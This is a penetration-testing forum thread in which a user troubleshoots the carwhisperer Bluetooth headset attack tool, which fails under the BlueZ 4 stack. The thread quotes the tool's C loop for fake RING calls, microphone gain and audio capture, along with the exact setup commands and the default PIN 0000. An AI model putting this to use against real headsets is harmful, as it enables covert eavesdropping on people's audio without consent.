Results 1 to 7 of 7

Thread: [NOT WORKING] Carwhisperer

  1. #1
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Default [NOT WORKING] Carwhisperer

    In BT4 because of the new bluetooth stack (bluez 4 instead of bluez 3.x) the tool carwhisperer doesn't work anymore.

    It is possible to start it, it will connect to the headset (if default PIN was set correctly), but it doesn't record anything (it fills up the output file with zeros).

    Maybe I screwed up something with the settings (however this is highly unlikely), but you know too that bluez 4 has no documentation at all, so figuring out how to change settings is really difficult.
    I would highly recommend (if the newer kernel still makes this possible) to return to bluez 3.x.

    Thank you,
    DOMy
    127.0.0.1 sweety 127.0.0.1???


    Home, sweety home

    -by HK!

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: [NOT WORKING] Carwhisperer

    Could you post the commands you used and their output to include error messages?
    Maybe we can either help or get it fixed.
    Thanks.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Arrow

    Quote Originally Posted by Archangel-Amael View Post
    Could you post the commands you used and their output to include error messages?
    Maybe we can either help or get it fixed.
    Thanks.
    Well, it is pretty easy: setting up the default passkey is not possible (hcid.conf is missing), this could be fixed by using some Python script I found on the net. After that, it is able to connect to the BT headset (no more Access denied message), but recording doesn't work, all we got is noise (after SOX postprocessing).
    I will look into the source code sometime, but maybe you can find out why this happens.

    EDIT2:
    Howto Install Carwhisperer on Ubuntu 9.10

    This might help, I will test it ASAP, if yes then please include the simple-agent and a short README file in the next Backtrack please.


    EDIT3-final:
    Well, I checked some stuff, and now I am able to connect to the headset, but all we got as replies are zeros, hcidump shows nicely how all the incoming packets contain only zeros, not valid data.
    I tried to send out a test file, and see it it gets played back on the headset, but no luck with that either. It seems that somehow between the stack and the actual hardware some stuff simply disappears or gets cut out or I don't know.

    To be short and simple: this part of the carwhisperer code fails with bluez-4 but it does work with bluez-3 (tested):

    Code:
    // turn up the speaker volume and the microphone gain to the highest level
        wlen = write(rd, "AT+VGS=15\r\n", 11);
        wlen = write(rd, "AT+VGM=15\r\n", 11);
        
        // send 'RING' message in order to initiate fake phone call 
        wlen = write(rd, "RING\r\n", 6);
    
    
        maxfd = (rd > sd) ? rd : sd;
    
        while (!terminate) {
    
            FD_ZERO(&rfds);
            FD_SET(rd, &rfds);
            FD_SET(sd, &rfds);
    
            timeout.tv_sec = 2;
            timeout.tv_usec = 0;
    
            if ((sel = select(maxfd + 1, &rfds, NULL, NULL, &timeout)) > 0) {
            
                if ((FD_ISSET(rd, &rfds))&&(scostarted!=0)) {
                    memset(buf, 0, sizeof(buf));
                    rlen = read(rd, buf, sizeof(buf));
                    //buf[rlen++] = '\0';
                    if (rlen > 0) {
                        fprintf(stderr, "got:  %s\n",buf);
                                            if (strncmp(buf, "AT+BRSF=",8)==0) {
                            wlen=write(rd,"+BRSF: 63\r\n",11);
                            fprintf(stderr, "ansewered:  +BRSF: 63\n");
                        } else if (strncmp(buf, "AT+CIND?",8)==0) { 
                            wlen=write(rd,"+CIND: 0,1,0,0\r\n",16);
                            fprintf(stderr, "ansewered: +CIND: 1\n");
                        } else if (strncmp(buf, "AT+CIND=?",9)==0) { 
                            wlen=write(rd,"+CIND: (\"call\",(0,1)),(\"service\",(0,1)),(\"call_setup\",(0-3)),(\"callsetup\",(0-3))\r\n",82);
                            fprintf(stderr, "ansewered: +CIND: (\"call\",(0,1)),(\"service\",(0,1)),(\"call_setup\",(0-3)),(\"callsetup\",(0-3))\n");
                        } else {
                            // answer to anything else with an 'OK'
                            wlen = write(rd, "OK\r\n", 4);
                            fprintf(stderr, "ansewered:  OK\n");
                        }
                    } else {
                        // check return value of read call
                        if (rlen==-1) {
                            // terminate loop
                            wlen = write(rd, "AT+VGM=15\r\n", 11);
                            terminate=1;
                        }
                    }
                }
                
                if (FD_ISSET(sd, &rfds)) {
                    scostarted=1;
                    memset(buf, 0, sizeof(buf));
                    rlen = read(sd, buf, sizeof(buf));
                    if (rlen > 0) {
                        wlen = write(fdo, buf, rlen);
                        rlen = read(fdi, buf, rlen);
                        wlen = 0; 
                        if (rlen > 0) p = buf;
                        while (rlen > sco_mtu) {
                                wlen += write(sd, p, sco_mtu);
                                rlen -= sco_mtu;
                                p += sco_mtu;
                        }
                        wlen += write(sd, p, rlen);
                    }
                }
                if (cnt++>800) {
    
                    // keep tuning up the volume for speaker and microphone
                    wlen = write(rd, "RING\r\n", 6);
                    wlen = write(rd, "AT+VGS=15\r\n", 11);
                    wlen = write(rd, "AT+VGM=15\r\n", 11);
                    cnt=0;
                    printf(".\n");
                }
            }
        }
    
        // close sockets 
        close(sd);
        close(rd);
    
        // close files
        close(fdi);
        close(fdo);
    
        return 0;
    }
    Thanks,
    DOMy
    Last edited by domi007; 10-10-2010 at 08:58 PM.
    127.0.0.1 sweety 127.0.0.1???


    Home, sweety home

    -by HK!

  4. #4
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Default Re: [NOT WORKING] Carwhisperer

    BUMP, no one does any Bluetooth hacking here? Please, someone?
    127.0.0.1 sweety 127.0.0.1???


    Home, sweety home

    -by HK!

  5. #5
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default Re: [NOT WORKING] Carwhisperer

    Quote Originally Posted by domi007 View Post
    BUMP, no one does any Bluetooth hacking here? Please, someone?
    Don't do that. Ever.

    You didn't provide all of what Amael asked for, we see no output to commands. Try complying with a request so that we can help you.

    Without any assistance from you, that big chunk of select code is useless to us. I can't say if it's a service= issue or a service issue, or whether or not the software is even associating correctly or just bailing down to saving blanks.

    Again, help us to help you.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  6. #6
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Default

    Quote Originally Posted by Gitsnik View Post
    Don't do that. Ever.

    You didn't provide all of what Amael asked for, we see no output to commands. Try complying with a request so that we can help you.

    Without any assistance from you, that big chunk of select code is useless to us. I can't say if it's a service= issue or a service issue, or whether or not the software is even associating correctly or just bailing down to saving blanks.

    Again, help us to help you.
    OKay, you are right, here are my steps:

    hciconfig hci0 up
    hciconfig
    (shows my BT dongle is up and running)
    hcitool scan
    (got my headsets BD address)

    /etc/init.d/bluetooth restart
    Stopping bluetoothd
    Starting bluetoothd

    #Following the instructions found on Howto Install Carwhisperer on Ubuntu 9.10

    wget http://mediakey.dk/~cc/files/simple-agent
    # Kill the existing passkey agent
    pkill -9 bluetooth-applet
    chmod +x simple-agent
    ./simple-agent
    Agent is running

    Opening a new shell tab:
    cd /pentest/bluetooth/carwhisperer
    ./carwhisperer hci0 message.raw out.raw <my headset's bd-address> 2
    (message.raw is an empty file, which I made using nano)
    Voice setting: 0x0060
    RFCOMM channel connected
    SCO audio channel connected (handle 45, mtu 64)

    The out.raw file contains only zeros. Also note that when carhisperer sniffs real data it prints a dot and a newline character on the screen like this:
    Voice setting: 0x0060
    RFCOMM channel connected
    SCO audio channel connected (handle 45, mtu 64)
    .
    .
    .
    .

    Under bt3 and bluez3 it did work perfectly. All I had to do is change some settings in the hcid.conf and restart the hci daemon. The changes I made were: auto authentication (or security mode or whatever it's called), pin 0000, lm mode MASTER, ACCEPT, class 0x050204 (phone).

    I am currently trying to change the class and the LM mode with hcitool, so far no success.


    mod: Finally changed the class and the lm mode, same result: only zeros in the output file.


    Thanks for your help,
    appreciate it a lot,
    DOMy

    I looked into things with hcidump and it seems that the headset is sending only zeroes, I don't know why, maybe it is a low level problem directly related to the BT stack.
    Will continue researching the issue, but need some other people too, so please help me

    DOMy
    Last edited by Archangel-Amael; 10-14-2010 at 07:20 PM.
    127.0.0.1 sweety 127.0.0.1???


    Home, sweety home

    -by HK!

  7. #7
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Default Re: [NOT WORKING] Carwhisperer

    Nobody?
    I guess than I will have to make my own distribution for hacking...well whatever
    127.0.0.1 sweety 127.0.0.1???


    Home, sweety home

    -by HK!

Similar Threads

  1. Carwhisperer help...
    By nightlybuild in forum Beginners Forum
    Replies: 10
    Last Post: 09-20-2010, 07:15 AM
  2. Replies: 1
    Last Post: 07-26-2010, 10:59 PM
  3. DNS Spoofing is working/working not!
    By htons139 in forum Beginners Forum
    Replies: 3
    Last Post: 05-19-2010, 08:20 PM
  4. Carwhisperer - problem with RFCOMM
    By nelis in forum OLD Newbie Area
    Replies: 1
    Last Post: 01-01-2009, 06:13 PM
  5. Belkin F5D7050e - Confirmed working/Not working?
    By Beanz in forum OLD Newbie Area
    Replies: 1
    Last Post: 12-07-2008, 06:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •